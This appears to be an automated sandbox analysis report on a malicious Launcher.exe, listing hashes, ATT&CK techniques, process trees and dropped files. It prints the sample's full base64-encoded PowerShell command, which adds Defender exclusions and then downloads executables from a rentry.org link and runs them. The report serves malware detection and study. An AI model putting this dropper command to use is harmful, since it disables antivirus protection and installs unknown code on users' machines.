8d7e3ee51b3228c604b607ad50508f60658f61793f802ee9236f288a17d512dd

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
27-06-2024 17:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Launcher.exe
Size

7KB
MD5

b5e479d3926b22b59926050c29c4e761
SHA1

a456cc6993d12abe6c44f2d453d7ae5da2029e24
SHA256

fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b
SHA512

09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8
SSDEEP

192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/lem61111111111/raw

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 1144 powershell.exe
6 1144 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

1144 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
5	1144	powershell.exe
6	1144	powershell.exe

pid	process
1144	powershell.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exechrome.exe

pid process

1144 powershell.exe
2552 chrome.exe
2552 chrome.exe

pid	process
1144	powershell.exe
2552	chrome.exe
2552	chrome.exe

Suspicious use of AdjustPrivilegeToken 27 IoCs

Processes:

powershell.exechrome.exe

description	pid	process
Token: SeDebugPrivilege	1144	powershell.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe
Token: SeShutdownPrivilege	2552	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exe

pid	process
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.exe

pid	process
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe
2552	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Launcher.exechrome.exe

description	pid	process	target process
PID 2440 wrote to memory of 1144	2440	Launcher.exe	powershell.exe
PID 2440 wrote to memory of 1144	2440	Launcher.exe	powershell.exe
PID 2440 wrote to memory of 1144	2440	Launcher.exe	powershell.exe
PID 2552 wrote to memory of 2608	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 2608	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 2608	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1440	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1608	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1608	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1608	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1712	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1712	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1712	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1712	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1712	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1712	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1712	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1712	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1712	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1712	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1712	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1712	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1712	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1712	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1712	2552	chrome.exe	chrome.exe
PID 2552 wrote to memory of 1712	2552	chrome.exe	chrome.exe

C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2440

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1144

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:2720

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2552

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef63f9758,0x7fef63f9768,0x7fef63f9778
2⤵
PID:2608

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1132 --field-trial-handle=1372,i,2791149859403752587,995946506758630961,131072 /prefetch:2
2⤵
PID:1440

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 --field-trial-handle=1372,i,2791149859403752587,995946506758630961,131072 /prefetch:8
2⤵
PID:1608

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1576 --field-trial-handle=1372,i,2791149859403752587,995946506758630961,131072 /prefetch:8
2⤵
PID:1712

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2244 --field-trial-handle=1372,i,2791149859403752587,995946506758630961,131072 /prefetch:1
2⤵
PID:1384

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2256 --field-trial-handle=1372,i,2791149859403752587,995946506758630961,131072 /prefetch:1
2⤵
PID:1328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1556 --field-trial-handle=1372,i,2791149859403752587,995946506758630961,131072 /prefetch:2
2⤵
PID:2164

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3180 --field-trial-handle=1372,i,2791149859403752587,995946506758630961,131072 /prefetch:1
2⤵
PID:1948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3456 --field-trial-handle=1372,i,2791149859403752587,995946506758630961,131072 /prefetch:8
2⤵
PID:548

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3568 --field-trial-handle=1372,i,2791149859403752587,995946506758630961,131072 /prefetch:8
2⤵
PID:316

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2872

C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:1
1⤵
PID:1156

C:\Program Files (x86)\Windows Media Player\setup_wm.exe
"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:1
2⤵
PID:2020

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
5KB

MD5
f5a16b804d15dc4e871d2ad8ecb46139

SHA1
5c9e9141901d7ffb960ccc5e6d76e0b86ceb55bc

SHA256
118b34da53866cee43d5b479c701bb72eff76356fcc3d0dcbcfddb60af79ddb7

SHA512
ef3fe72a929fac686eb5b40abe99031371004335695e9c23b4bd28e5028c8fffd04d6250b5e1de34ce8cfe7fca1f8eb00a0bc50dd10b60e4e84bcc6c2c16d2c0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000007.dbtmp
Filesize
16B

MD5
18e723571b00fb1694a3bad6c78e4054

SHA1
afcc0ef32d46fe59e0483f9a3c891d3034d12f32

SHA256
8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

SHA512
43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
294KB

MD5
916fbb12cf2b9e7a86028aef7d4b790d

SHA1
99a8424dc4f20d42f4eaf1eaefd5668be891ed09

SHA256
3a9838492abf485f10fce3e34b4aa8610d47ea3feef6dfbde2202378b473dc38

SHA512
d2c9a2359c6c866c82813e3c0b3d55973a7723ed48e4a73666253ad19ab300472c6166c7f7a0952cbeb03a484ba41cc8c066d195f57e09d8a92bac0c8a15b66d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
294KB

MD5
521101d1e132f87151fb5710b3da61cc

SHA1
c51c5055ab9b34d208b7bb00f419ae47879f9f8a

SHA256
f416864d5dba935a6b8001d4fdbcbe5395261edc243dbebba4f3992ab7558df2

SHA512
c9208da8f97068df43c106338e3b5cd7f0f4e7a032480ac7317d0803eaf88c4a1556a3ad4d2601c395bc23b674c9969007f0034e7c2bde6d5de9b03184c9083d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp12237.WMC\allservices.xml
Filesize
546B

MD5
df03e65b8e082f24dab09c57bc9c6241

SHA1
6b0dacbf38744c9a381830e6a5dc4c71bd7cedbf

SHA256
155b9c588061c71832af329fafa5678835d9153b8fbb7592195ae953d0c455ba

SHA512
ef1cc8d27fbc5da5daab854c933d3914b84ee539d4d2f0126dc1a04a830c5599e39a923c80257653638b1b99b0073a7174cc164be5887181730883c752ba2f99

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp13781.WMC\serviceinfo.xml
Filesize
523B

MD5
d58da90d6dc51f97cb84dfbffe2b2300

SHA1
5f86b06b992a3146cb698a99932ead57a5ec4666

SHA256
93acdb79543d9248ca3fca661f3ac287e6004e4b3dafd79d4c4070794ffbf2ad

SHA512
7f1e95e5aa4c8a0e4c967135c78f22f4505f2a48bbc619924d0096bf4a94d469389b9e8488c12edacfba819517b8376546687d1145660ad1f49d8c20a744e636

Download Submit
\??\pipe\crashpad_2552_WVUFZKQCYGRAVITY
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1144-9-0x0000000002BF0000-0x0000000002C70000-memory.dmp

Filesize
512KB

Download
memory/1144-8-0x00000000027E0000-0x00000000027E8000-memory.dmp

Filesize
32KB

Download
memory/1144-7-0x000000001B560000-0x000000001B842000-memory.dmp

Filesize
2.9MB

Download
memory/1144-6-0x0000000002BF0000-0x0000000002C70000-memory.dmp

Filesize
512KB

Download
memory/2440-0-0x000007FEF5A33000-0x000007FEF5A34000-memory.dmp

Filesize
4KB

Download
memory/2440-1-0x00000000010F0000-0x00000000010F8000-memory.dmp

Filesize
32KB

Download